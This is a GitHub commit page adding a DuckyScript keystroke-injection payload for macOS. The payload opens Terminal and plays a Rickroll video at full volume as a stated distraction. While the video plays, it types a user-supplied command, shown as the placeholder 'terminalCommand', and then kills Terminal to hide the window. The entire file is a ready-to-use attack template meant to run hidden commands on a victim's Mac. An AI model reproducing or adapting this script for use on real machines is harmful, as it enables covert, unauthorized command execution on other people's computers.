Merge pull request #49 from nilsstreedain/master

Added rickroll_terminal_payload
pull/51/head
Darren Kitchen 2022-03-07 10:12:34 -06:00 committed by GitHub
commit 17d8b01145
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 26 additions and 0 deletions

View File

@ -0,0 +1,26 @@
REM Title: macOS rickroll with terminal payload
REM Author: Nils Streedain
REM Description:Opens a rickroll in YouTube in full screen at maximum volume
REM as a distraction while another command is run in terminal.
REM (Replace terminalCommand with your own command)
REM Target: macOS 11.0+
REM Version: 1.0
REM Category: Execution
REM Source: https://github.com/nilsstreedain/Ducky-Scripts/
DELAY 100
COMMAND SPACE
DELAY 10
STRING terminal
DELAY 100
ENTER
DELAY 100
STRING open 'https://www.youtube.com/watch?v=dQw4w9WgXcQ'
ENTER
DELAY 1000
COMMAND TAB
DELAY 10
STRING osascript -e 'set volume 7' && terminalCommand && killall Terminal
ENTER
DELAY 500
STRING f